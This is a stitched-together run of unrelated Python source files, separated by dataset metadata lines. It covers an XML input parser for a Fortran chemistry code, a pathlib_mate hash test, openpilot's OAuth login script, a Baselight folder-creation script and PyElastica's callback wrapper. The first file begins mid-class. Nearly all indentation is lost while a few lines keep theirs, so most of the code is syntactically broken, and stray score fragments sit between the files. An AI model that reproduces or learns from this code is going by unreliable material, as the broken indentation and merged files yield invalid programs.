for definition_tag in self.definition.findall('class'):
if definition_tag.attrib['name'] not in self.child_definitions:
child = InputXML(parent_object = self, definition = definition_tag)
self.children.append(child)
child.parse()
def handle_folders(self):
"""
Creates missing folders and replaces relative paths with
non-relative ones
"""
for parameter_name in self.parameter_values:
if parameter_name in ['output_folder', 'input_folder', 'folder_path']:
if self.parameter_values[parameter_name] is not None:
# convert the non absolute paths to absolute ones
if not os.path.isabs(self.parameter_values[parameter_name]):
# join the directory of the file with the input directory
path = os.path.join(self.directory, self.parameter_values[parameter_name])
# make the path more readable by removing extra slashes and dots
self.parameter_values[parameter_name] = os.path.normpath(path)
# if the output folder does not exist, create it
if parameter_name == 'output_folder' and not os.path.exists(self.parameter_values[parameter_name]):
os.makedirs(self.parameter_values[parameter_name])
for child in self.children:
child.handle_folders()
def get_interface_argument_values(self, argument_values, parameter_definitions = {}, abbreviation = None, counter_present = False):
"""
This function converts the values of the parameters to a form suitable for the
Fortran interface. The converted values are stored to input-output dictionary 'arguments_values'.
"""
if 'abbreviation' in self.definition.attrib:
abbreviation = self.definition.attrib['abbreviation']
for parameter_name in self.parameter_values:
if SettingsGenerator.generate_fortran(self.parameter_definitions[parameter_name]):
if abbreviation is not None:
argument_key = "{}_{}".format(abbreviation, parameter_name)
else:
argument_key = parameter_name
if counter_present:
# Check if the parameter value is None. If the value is None, the
# parameter is not present in the input file, and the default
# value of the parameter is not specified.
if self.parameter_values[parameter_name] is not None:
if argument_key in argument_values and argument_values[argument_key] is not None:
argument_values[argument_key].append(self.parameter_values[parameter_name])
else:
argument_values[argument_key] = [self.parameter_values[parameter_name]]
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
else:
if argument_key not in parameter_definitions:
argument_values[argument_key] = None
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
else:
if argument_key in argument_values:
print("Warning: Found two (or more) arguments for the same parameter: {}".format(argument_key))
else:
argument_values[argument_key] = self.parameter_values[parameter_name]
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
for child in self.children:
if 'global_index_counter' in child.definition.attrib or 'local_index_counter' in child.definition.attrib or 'counters' in child.definition.attrib:
counter_present = True
if SettingsGenerator.generate_fortran(child.definition):
child.get_interface_argument_values(argument_values, parameter_definitions, abbreviation = abbreviation, counter_present = counter_present)
# if we are at the root, convert the values with type list to numpy arrays
if self.parent_object is None:
for argument_key in list(argument_values):
# the string lists need some special attention:
if parameter_definitions[argument_key].attrib['type'].startswith('string') and type(argument_values[argument_key]) == list:
temp = numpy.empty((256, len(argument_values[argument_key])+1), dtype="c")
for j, value in enumerate(argument_values[argument_key]):
temp[:, j] = "{0:{width}}".format(argument_values[argument_key][j], width=256)
argument_values[argument_key] = numpy.array(temp, dtype="c").T
elif type(argument_values[argument_key]) == list:
temp_array = numpy.array(argument_values[argument_key], order='F').T
shape = temp_array.shape
if len(shape) == 3:
new_shape = (shape[0], shape[1], shape[2]+1)
elif len(shape) == 2:
new_shape = (shape[0], shape[1]+1)
else:
new_shape = (shape[0]+1)
new_array = numpy.empty(new_shape, order='F')
if len(shape) == 3:
new_array[:, :, :shape[2]] = temp_array[:, :, :]
elif len(shape) == 2:
new_array[:, :shape[1]] = temp_array[:, :]
else:
new_array[:shape[0]] = temp_array[:]
argument_values[argument_key] = new_array
elif argument_values[argument_key] is None:
del argument_values[argument_key]
def add_counters(self, child):
"""
Add all the counter values for the child object 'child' of 'self' by one
"""
if 'global_index_counter' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['global_index_counter'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['global_index_counter']))
else:
child.id = self.get_counter_value(child.definition.attrib['global_index_counter'])
if 'local_index_counter' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['local_index_counter'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['local_index_counter']))
if 'counters' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['counters'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['counters']))
def add_counter_value(self, counter_name):
"""
Add value of counter parameter with name=='counter_name' by one.
If the counter is not found in the local object, it
        is searched from the parent objects.
"""
if counter_name in self.parameter_values:
if self.parameter_values[counter_name] is None:
self.parameter_values[counter_name] = 0
self.parameter_values[counter_name] += 1
return True
else:
if self.parent_object is not None:
return self.parent_object.add_counter_value(counter_name)
else:
return False
def get_counter_value(self, counter_name):
"""
Get the value of a counter with name 'counter_name'.
If the counter is not found in the local object, it
        is searched from the parent objects.
"""
if counter_name in self.parameter_values:
return self.parameter_values[counter_name]
else:
if self.parent_object is not None:
return self.parent_object.get_counter_value(counter_name)
else:
return -1
def set_parameter_value(self, parameter_definition, value):
"""
Set an arbitrary value 'value' for the parameter with definition
'parameter_definition'.
"""
# convert the value to right data type and check that it is valid
final_value = self.convert_argument_value(value, parameter_definition)
# check that value is within given limits
self.check_value_range(final_value, parameter_definition)
# set the parameter value
self.parameter_values[parameter_definition.attrib['name']] = final_value
@staticmethod
def read_tag_or_attribute_value(root, name):
"""
Reads the value of a tag or attribute with name 'name' in an xml. If
attribute or tag is not found, None is returned.
"""
value = None
if root is not None:
tag = root.find(name)
if tag is not None:
value = tag.text
elif name in root.attrib:
value = root.attrib[name]
return value
def read_parameter_value(self, parameter_definition):
"""
Read the value of the parameter first from the values of the XML-element,
secondarily from the objects we are extending from and thirdly from
the default value of the parameter definition.
"""
value = InputXML.read_tag_or_attribute_value(self.root, parameter_definition.attrib['name'])
# if value is not found at root, then use the value from extends roots
if value is None and hasattr(self, 'extends_roots') and self.extends_roots is not None:
for extends_root in self.extends_roots:
value = InputXML.read_tag_or_attribute_value(extends_root, parameter_definition.attrib['name'])
# if value is found, break the iteration
if value is not None:
break
# fall back to default value/or None if one is not specified
if value is None:
if 'default' in parameter_definition.attrib:
value = parameter_definition.attrib['default']
return value
def get_parameter_value(self, parameter_name):
"""
Get the value of the parameter from the parsed parameters.
If the parameter is not found an InputProgrammingError
is raised.
"""
if hasattr(self, 'parameter_values') and parameter_name in self.parameter_values:
return self.parameter_values[parameter_name]
else:
raise InputProgrammingError("Accessed parameter: '{}' is not in the values ".format(parameter_name)+ \
"of the object. Have you perfomed 'parse' for the object?")
def parameter_values_are_equal(self, other, parameter_name):
"""
Compare the values of parameter with name 'parameter_name' for
two objects of the same type.
"""
# check that the input objects are of same type
if type(self) != type(other):
raise InputProgrammingError("The objects compared with parameter_values_are_equal"+
" are not of same type.")
# get the values for both input objects
self_value = self.get_parameter_value(parameter_name)
other_value = other.get_parameter_value(parameter_name)
if isinstance(self_value, list) or isinstance(self_value, numpy.ndarray):
if len(self_value) != len(other_value):
return False
for i in range(len(self_value)):
                if isinstance(self_value[i], (float, numpy.float64, numpy.float32, numpy.float16)):
if abs(self_value[i] - other_value[i]) > 1e-10:
return False
elif self_value[i] != other_value[i]:
return False
return True
else:
return self_value == other_value
def all_parameter_values_are_equal(self, other):
"""
Check if all parameter values of 'self' and 'other'
are equal
"""
for parameter_name in self.parameter_values:
if not self.parameter_values_are_equal(other, parameter_name):
return False
return True
def is_of_same_type_as(self, other):
"""
Check if self is of same type as other
"""
return type(self) == type(other) \
and self.definition.attrib['name'] == other.definition.attrib['name']
def children_are_equal(self, other):
"""
Check if children of 'self' and 'other' are equal with definition
and value
"""
for child in self.children:
equal_found = False
# go through all the children and check if there is equal
for other_child in other.children:
if child == other_child:
equal_found = True
# if not, the children cannot be equal
if not equal_found:
return False
return True
def __eq__(self, other):
"""
Check if two InputXML objects are equal with each other
"""
return self.is_of_same_type_as(other)\
and self.all_parameter_values_are_equal(other)\
and self.children_are_equal(other)
def __ne__(self, other):
return not self.__eq__(other)
def read_array_values(self, value_text, argument_type):
is_number = argument_type.startswith("int") or \
argument_type.startswith("float") or \
argument_type.startswith("double")
        # try to evaluate the value text as a dictionary (e.g. "1: 0.5, 3: 1.5")
try:
dictionary = ast.literal_eval("{"+ value_text +"}")
size = max(dictionary.keys())
# init array of size
if is_number:
result = [0] * size
else:
result = [None] * size
for key in dictionary:
# convert the indexing from the 1-starting to 0-starting
result[key-1] = dictionary[key]
except:
try:
result = ast.literal_eval("["+ value_text +"]")
except:
raise Exception("Bad form of array, should have a list or a dictionary, value is: {}.".format(value_text))
return result
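    # Illustrative examples of the two value forms this parser accepts (a sketch,
    # assuming a numeric array type; the values are made up):
    #   list form:                    "1.0, 2.0, 3.0"  ->  [1.0, 2.0, 3.0]
    #   dict form (1-based indices):  "1: 0.5, 3: 1.5" ->  [0.5, 0, 1.5]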
def convert_argument_value(self, value_text, parameter_definition):
argument_type = parameter_definition.attrib['type']
if SettingsGenerator.has_options(parameter_definition):
value_text = self.get_option_value(value_text, parameter_definition)
if SettingsGenerator.is_array(parameter_definition):
if value_text is None:
value = None
else:
# do the parsing of the input array (could also be a dictionary), which
# has to be changed to a list
array_values = self.read_array_values(value_text, argument_type)
# get the final size of the result array from the parameter definition
size = int(parameter_definition.attrib['shape'])
value = numpy.zeros(size)
try:
for i, arg in enumerate(array_values):
if argument_type.startswith('int'):
value[i] = int(arg)
if argument_type.startswith('float'):
value[i] = float(arg)
if argument_type.startswith('double'):
value[i] = float(arg)
if argument_type.startswith('string'):
if SettingsGenerator.generate_fortran(parameter_definition):
value[i] = str(arg)
else:
value[i] = str(arg)
if argument_type.startswith('bool'):
if arg.lower() == 'false':
value[i] = False
elif arg.lower() == 'true':
value[i] = True
else:
value[i] = bool(arg)
except ValueError:
sys.exit('Error: parameter with type \'{}\' and name \'{}\' has invalid value: \'{}\''.format(argument_type, parameter_definition.attrib['name'], value_text))
else:
try:
if value_text is None:
value = None
elif argument_type.startswith('int'):
value = int(value_text)
elif argument_type.startswith('float'):
value = float(value_text)
elif argument_type.startswith('double'):
value = float(value_text)
elif argument_type.startswith('string'):
if SettingsGenerator.generate_fortran(parameter_definition):
value = str(value_text)
else:
value = str(value_text)
elif argument_type.startswith('bool'):
if value_text.lower() == 'false':
value = False
elif value_text.lower() == 'true':
value = True
else:
                        value = bool(value_text)
except ValueError:
sys.exit('Error: parameter with type \'{}\' and name \'{}\' has invalid value: \'{}\''.format(argument_type, parameter_definition.attrib['name'], value_text))
return value
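    # A hypothetical conversion, to illustrate the array branch above (assuming the
    # parameter definition has type="int" and shape="4"; SettingsGenerator decides
    # whether the parameter is treated as an array):
    #   value_text "2, 4, 6"  ->  numpy array of length 4: [2., 4., 6., 0.]
    #   (the result is built with numpy.zeros, so the entries are stored as floats)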
def check_value_range(self, value, parameter_definition):
if value is not None:
if 'minval' in parameter_definition.attrib:
minval = parameter_definition.attrib['minval']
if value < float(minval):
                    sys.exit('Error: argument with name {} and value {} is smaller than the smallest allowed value: {}'.format(parameter_definition.attrib['name'], value, float(minval)))
if 'maxval' in parameter_definition.attrib:
maxval = parameter_definition.attrib['maxval']
if value > float(maxval):
                    sys.exit('Error: argument with name {} and value {} is larger than the largest allowed value: {}'.format(parameter_definition.attrib['name'], value, float(maxval)))
def get_option_value(self, value_text, parameter_definition):
options = parameter_definition.findall('option')
result = None
if len(options) > 0:
valid_options = ""
for option in options:
if 'value' in option.attrib and value_text == option.attrib['value']:
return value_text
elif 'text_value' in option.attrib and value_text == option.attrib['text_value']:
return option.attrib['value']
else:
valid_options += ("{}: {} ".format(option.attrib['value'], option.attrib['text_value']))
sys.exit('Error: The value "{}" for argument with name "{}" is not within allowed options: {} '.format(value_text, parameter_definition.attrib['name'], valid_options))
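    # A sketch of how options resolve (hypothetical definition):
    #   <option value="1" text_value="closed_shell"/>
    #   value_text "1"             ->  returns "1"
    #   value_text "closed_shell"  ->  returns "1"
    #   any other value            ->  exits with the list of valid options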
def get_root_object(self):
if self.parent_object is None:
return self
else:
return self.parent_object.get_root_object()
class SCFEnergeticsXML(InputXML):
tag_type = 'scf_energetics'
definition_tag = 'scf_energetics_input'
class ActionXML(InputXML):
tag_type = 'action'
definition_tag = 'action_input'
def parse(self):
super(ActionXML, self).parse()
self.handle_output_files()
def handle_output_files(self):
"""
Reads in the output files and creates the corresponding
objects to the tree
"""
if 'output_folder' in self.parameter_values:
scf_energetics_filename = \
os.path.join(self.parameter_values['output_folder'], "scf_energetics.xml")
root_object = self.get_root_object()
# if scf energetics file exists, parse it and add as a child of the root
# and set it as the input scf energetics of the action
if os.path.exists(os.path.join(self.directory, scf_energetics_filename)):
scf_energetics_definition = root_object.definition.find('scf_energetics_input')
scf_energetics = SCFEnergeticsXML(parent_object = root_object, \
definition = scf_energetics_definition)
scf_energetics.root = scf_energetics.retrieve_path(scf_energetics_filename, scf_energetics.directory)
root_object.children.append(scf_energetics)
root_object.child_definitions.append('scf_energetics')
root_object.add_counters(scf_energetics)
scf_energetics.parse()
scf_energetics_id_definition = self.get_parameter_definition('scf_energetics_id')
self.set_parameter_value(scf_energetics_id_definition, scf_energetics.id)
structure_filename = \
os.path.join(self.parameter_values['output_folder'], "structure.xml")
# if structure file exists, parse it and add it as a child of the root
# and set it as the input structure of the action
if os.path.exists(os.path.join(self.directory, structure_filename)):
structure_definition = root_object.definition.find('structure_input')
structure = StructureXML(parent_object = root_object, \
definition = structure_definition)
structure.root = structure.retrieve_path(structure_filename, structure.directory)
root_object.children.append(structure)
root_object.child_definitions.append('structure')
root_object.add_counters(structure)
structure.parse()
structure_id_definition = self.get_parameter_definition('structure_id')
self.set_parameter_value(structure_id_definition, structure.id)
class BasisSetXML(InputXML):
tag_type = 'basis_set'
definition_tag = 'basis_set_input'
class SettingsXML(InputXML):
tag_type = 'settings'
definition_tag = 'settings_input'
class StructureXML(InputXML):
tag_type = 'structure'
definition_tag = 'structure_input'
atom_types = {'H':1, 'He':2, 'Li':3, 'Be':4, 'B':5, 'C':6, 'N':7, 'O':8, 'F':9, 'Ne':10, 'Na': 11, 'Mg':12, 'Al':13, 'Si':14, 'P':15, 'S':16, 'Cl':17, 'Ar':18}
def read_input(self):
charge = self.root.find('charge')
# read relative charge
if (charge is not None):
self.charge = int(charge.text)
else:
self.charge = 0
# read coordinates and atom types
self.coordinates = []
self.types = []
self.charges = []
# first read atom coordinates in 'atom' tags
for i, atom in enumerate(self.root.findall('atom')):
self.read_atom_coordinates_and_type(atom)
# then read atoms in 'atoms' tags
for i, atoms in enumerate(self.root.findall('atoms')):
self.read_atoms_coordinates_and_types(atoms)
def read_atom_coordinates_and_type(self, atom):
result = [0.0, 0.0, 0.0]
x = atom.find('x')
if (x is not None):
result[0] = float(x.text)
y = atom.find('y')
if (y is not None):
result[1] = float(y.text)
z = atom.find('z')
if (z is not None):
result[2] = float(z.text)
xyz = atom.find('xyz')
        atom_type = self.read_atom_type(atom)
        # make sure the charge is defined even when the coordinates are not given in an 'xyz' tag
        atom_charge = self.get_atom_charge(atom_type) if atom_type in self.atom_types else None
if (xyz is not None):
xyz_text = xyz.text.strip().split(" ")
if (len(xyz_text) == 4):
                atom_type = self.get_atom_type(xyz_text[0])
                atom_charge = self.get_atom_charge(xyz_text[0])
result[0] = float(xyz_text[1])
result[1] = float(xyz_text[2])
result[2] = float(xyz_text[3])
else:
sys.exit("Error: Too many or too few coordinates in 'atom'->'xyz' -tag.")
self.coordinates.append(result)
self.types.append(atom_type)
self.charges.append(atom_charge)
def get_atom_type(self, atom_type_text):
return int(self.atom_types[atom_type_text])
def get_atom_charge(self, atom_type_text):
return float(self.atom_types[atom_type_text])
def read_atom_type(self, atom):
if 'type' in atom.attrib:
return atom.attrib['type']
else:
sys.exit("Error: The mandatory attribute 'type' not found in 'atom'-tag")
def read_atoms_coordinates_and_types(self, atoms):
xyz = atoms.find('xyz')
coordinates = []
types = []
charges = []
if (xyz is not None):
xyz_lines = xyz.text.splitlines()
for xyz in xyz_lines:
xyz_text = xyz.strip().split(" ")
xyz_coord = [0.0, 0.0, 0.0]
# ignore empty lines
if (len(xyz_text) == 1 and xyz_text[0] == ""):
continue
elif (len(xyz_text) == 4):
types.append(self.get_atom_type(xyz_text[0]))
charges.append(self.get_atom_charge(xyz_text[0]))
xyz_coord[0] = float(xyz_text[1])
xyz_coord[1] = float(xyz_text[2])
xyz_coord[2] = float(xyz_text[3])
coordinates.append(xyz_coord)
else:
sys.exit("Error: Too many or too few coordinates in 'atoms'->'xyz' -line.")
self.coordinates.extend(coordinates)
self.types.extend(types)
self.charges.extend(charges)
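    # A hypothetical 'atoms' fragment this parser accepts, one "<type> x y z" entry
    # per line (fields must be separated by single spaces, since each line is split
    # on ' '):
    #   <atoms>
    #     <xyz>
    #       O 0.0 0.0 0.0
    #       H 0.0 0.757 0.586
    #       H 0.0 -0.757 0.586
    #     </xyz>
    #   </atoms>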
if __name__ == "__main__":
if len(sys.argv) <= 1:
print("Give the input file name as an input.")
else:
inp = InputXML(filename = sys.argv[1], definition_filename = os.path.dirname(os.path.realpath(__file__))+"/input_parameters.xml")
import dage_fortran
dage_fortran.python_interface.run(**inp.prepare())
| 1.375 | 1 |
tests/test_mate_hashes_methods.py | MacHu-GWU/pathlib_mate-project | 9 | 5096 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import pytest
from pathlib_mate.pathlib2 import Path
class TestHashesMethods(object):
def test(self):
p = Path(__file__)
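        # This test file is far smaller than 1 MiB, so each partial hash (first
        # 1 << 20 bytes) equals the corresponding full hash and the set collapses
        # to exactly three distinct digests (md5, sha256, sha512).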
assert len({
p.md5, p.get_partial_md5(nbytes=1 << 20),
p.sha256, p.get_partial_sha256(nbytes=1 << 20),
p.sha512, p.get_partial_sha512(nbytes=1 << 20),
}) == 3
if __name__ == "__main__":
import os
basename = os.path.basename(__file__)
pytest.main([basename, "-s", "--tb=native"])
| 2.328125 | 2 |
tools/lib/auth.py | shoes22/openpilot | 121 | 5097 | #!/usr/bin/env python3
"""
Usage::
usage: auth.py [-h] [{google,apple,github,jwt}] [jwt]
Login to your comma account
positional arguments:
{google,apple,github,jwt}
jwt
optional arguments:
-h, --help show this help message and exit
Examples::
./auth.py # Log in with google account
./auth.py github # Log in with GitHub Account
./auth.py jwt ey......hw # Log in with a JWT from https://jwt.comma.ai, for use in CI
"""
import argparse
import sys
import pprint
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Dict
from urllib.parse import parse_qs, urlencode
from tools.lib.api import APIError, CommaApi, UnauthorizedError
from tools.lib.auth_config import set_token, get_token
PORT = 3000
class ClientRedirectServer(HTTPServer):
query_params: Dict[str, Any] = {}
class ClientRedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
if not self.path.startswith('/auth'):
self.send_response(204)
return
query = self.path.split('?', 1)[-1]
query = parse_qs(query, keep_blank_values=True)
self.server.query_params = query
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(b'Return to the CLI to continue')
def log_message(self, format, *args): # pylint: disable=redefined-builtin
    pass  # this prevents the http server from dumping messages to stdout
def auth_redirect_link(method):
provider_id = {
'google': 'g',
'apple': 'a',
'github': 'h',
}[method]
params = {
'redirect_uri': f"https://api.comma.ai/v2/auth/{provider_id}/redirect/",
'state': f'service,localhost:{PORT}',
}
if method == 'google':
params.update({
'type': 'web_server',
'client_id': '45471411055-ornt4svd2miog6dnopve7qtmh5mnu6id.apps.googleusercontent.com',
'response_type': 'code',
'scope': 'https://www.googleapis.com/auth/userinfo.email',
'prompt': 'select_account',
})
return 'https://accounts.google.com/o/oauth2/auth?' + urlencode(params)
elif method == 'github':
params.update({
'client_id': '28c4ecb54bb7272cb5a4',
'scope': 'read:user',
})
return 'https://github.com/login/oauth/authorize?' + urlencode(params)
elif method == 'apple':
params.update({
'client_id': 'ai.comma.login',
'response_type': 'code',
'response_mode': 'form_post',
'scope': 'name email',
})
return 'https://appleid.apple.com/auth/authorize?' + urlencode(params)
else:
raise NotImplementedError(f"no redirect implemented for method {method}")
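# Roughly what the returned URL looks like for the 'github' method (illustrative;
# parameter order and escaping come from urlencode, so details may differ):
#   https://github.com/login/oauth/authorize?redirect_uri=https%3A%2F%2Fapi.comma.ai%2Fv2%2Fauth%2Fh%2Fredirect%2F&state=service%2Clocalhost%3A3000&client_id=28c4ecb54bb7272cb5a4&scope=read%3Auser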
def login(method):
oauth_uri = auth_redirect_link(method)
web_server = ClientRedirectServer(('localhost', PORT), ClientRedirectHandler)
print(f'To sign in, use your browser and navigate to {oauth_uri}')
webbrowser.open(oauth_uri, new=2)
while True:
web_server.handle_request()
if 'code' in web_server.query_params:
break
elif 'error' in web_server.query_params:
print('Authentication Error: "%s". Description: "%s" ' % (
web_server.query_params['error'],
web_server.query_params.get('error_description')), file=sys.stderr)
break
try:
auth_resp = CommaApi().post('v2/auth/', data={'code': web_server.query_params['code'], 'provider': web_server.query_params['provider']})
set_token(auth_resp['access_token'])
except APIError as e:
print(f'Authentication Error: {e}', file=sys.stderr)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Login to your comma account')
parser.add_argument('method', default='google', const='google', nargs='?', choices=['google', 'apple', 'github', 'jwt'])
parser.add_argument('jwt', nargs='?')
args = parser.parse_args()
if args.method == 'jwt':
if args.jwt is None:
print("method JWT selected, but no JWT was provided")
exit(1)
set_token(args.jwt)
else:
login(args.method)
try:
me = CommaApi(token=get_token()).get('/v1/me')
print("Authenticated!")
pprint.pprint(me)
except UnauthorizedError:
print("Got invalid JWT")
exit(1)
| 2.53125 | 3 |
datedfolder.py | IgorRidanovic/flapi | 3 | 5098 | <gh_stars>1-10
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
Create a Baselight folder with current date and time stamp.
You must refresh the Job Manager after running the script.
Copyright (c) 2020 <NAME>, Igor [at] hdhead.com, www.metafide.com
'''
import flapi
from getflapi import getflapi
from datetime import datetime
def make_dated_folder(ip, scene, foldername):
conn, msg = getflapi()
jobman = conn.JobManager
stamp = datetime.now().strftime('_%d-%b-%Y_%H.%M.%S')
try:
jobman.create_folder(ip, scene, foldername + stamp)
except flapi.FLAPIException:
        print('Could not create a folder.')
return False
# Cleanup
conn.close()
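# For example (illustrative): make_dated_folder(ip, 'Test01', 'MyFolder') run on
# 5 March 2020 at 14:30:05 would create a folder named 'MyFolder_05-Mar-2020_14.30.05'.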
if __name__=='__main__':
conn, msg = getflapi()
    print(msg + '\n')
ip = 'localhost'
currentScene = 'Test01'
folderName = 'MyFolder'
make_dated_folder(ip, currentScene, folderName)
| 2.703125 | 3 |
elastica/wrappers/callbacks.py | zhidou2/PyElastica | 71 | 5099 | <reponame>zhidou2/PyElastica<gh_stars>10-100
__doc__ = """
CallBacks
-----------
Provides the callBack interface to collect data over time (see `callback_functions.py`).
"""
from elastica.callback_functions import CallBackBaseClass
class CallBacks:
"""
CallBacks class is a wrapper for calling callback functions, set by the user. If the user
wants to collect data from the simulation, the simulator class has to be derived
from the CallBacks class.
Attributes
----------
_callbacks: list
List of call back classes defined for rod-like objects.
"""
def __init__(self):
self._callbacks = []
super(CallBacks, self).__init__()
def collect_diagnostics(self, system):
"""
        This method registers a user-defined callback class for a
        user-defined system or rod-like object. Pass in the system or
        rod-like object that you want to collect data from.
Parameters
----------
system: object
System is a rod-like object.
Returns
-------
"""
sys_idx = self._get_sys_idx_if_valid(system)
        # Create _CallBack object, cache it and return to user
_callbacks = _CallBack(sys_idx)
self._callbacks.append(_callbacks)
return _callbacks
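    # A minimal usage sketch (assuming the usual PyElastica pattern; 'MyCallBack',
    # 'rod' and the BaseSystemCollection import live outside this module):
    #
    #   class MySimulator(BaseSystemCollection, CallBacks):
    #       pass
    #
    #   simulator = MySimulator()
    #   simulator.append(rod)
    #   simulator.collect_diagnostics(rod).using(
    #       MyCallBack, step_skip=100, callback_params=defaultdict(list)
    #   )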
def _finalize(self):
        # From stored _CallBack objects, instantiate the callback classes
        # inplace : https://stackoverflow.com/a/1208792
        # dev : the first index stores the rod index to collect data from.
        # Technically we can use another array but it is one more book-keeping
        # step. Being lazy, I put them both in the same array
self._callbacks[:] = [
(callback.id(), callback(self._systems[callback.id()]))
for callback in self._callbacks
]
# Sort from lowest id to highest id for potentially better memory access
# _callbacks contains list of tuples. First element of tuple is rod number and
        # following elements are the callback objects, such as
# [(0, MyCallBack), (1, MyVelocityCallBack), ... ]
# Thus using lambda we iterate over the list of tuples and use rod number (x[0])
# to sort callbacks.
self._callbacks.sort(key=lambda x: x[0])
self._callBack(time=0.0, current_step=0)
# TODO: same as above naming of _callBack function
def _callBack(self, time, current_step: int, *args, **kwargs):
for sys_id, callback in self._callbacks:
callback.make_callback(
self._systems[sys_id], time, current_step, *args, **kwargs
)
class _CallBack:
"""
CallBack wrapper private class
Attributes
----------
_sys_idx: rod object index
_callback_cls: list
*args
Variable length argument list.
**kwargs
Arbitrary keyword arguments.
"""
def __init__(self, sys_idx: int):
"""
Parameters
----------
sys_idx: int
"""
self._sys_idx = sys_idx
self._callback_cls = None
self._args = ()
self._kwargs = {}
def using(self, callback_cls, *args, **kwargs):
"""
This method is a wrapper to set which callback class is used to collect data
from user defined rod-like object.
Parameters
----------
callback_cls: object
User defined callback class.
*args
Variable length argument list
**kwargs
Arbitrary keyword arguments.
Returns
-------
"""
assert issubclass(
callback_cls, CallBackBaseClass
), "{} is not a valid call back. Did you forget to derive from CallBackClass?".format(
callback_cls
)
self._callback_cls = callback_cls
self._args = args
self._kwargs = kwargs
return self
def id(self):
return self._sys_idx
def __call__(self, *args, **kwargs):
"""Constructs a callback functions after checks
Parameters
----------
args
kwargs
Returns
-------
"""
if not self._callback_cls:
raise RuntimeError(
"No callback provided to act on rod id {0}"
"but a callback was registered. Did you forget to call"
"the `using` method".format(self.id())
)
try:
return self._callback_cls(*self._args, **self._kwargs)
except (TypeError, IndexError):
raise TypeError(
r"Unable to construct callback class.\n"
r"Did you provide all necessary callback properties?"
)
| 2.703125 | 3 |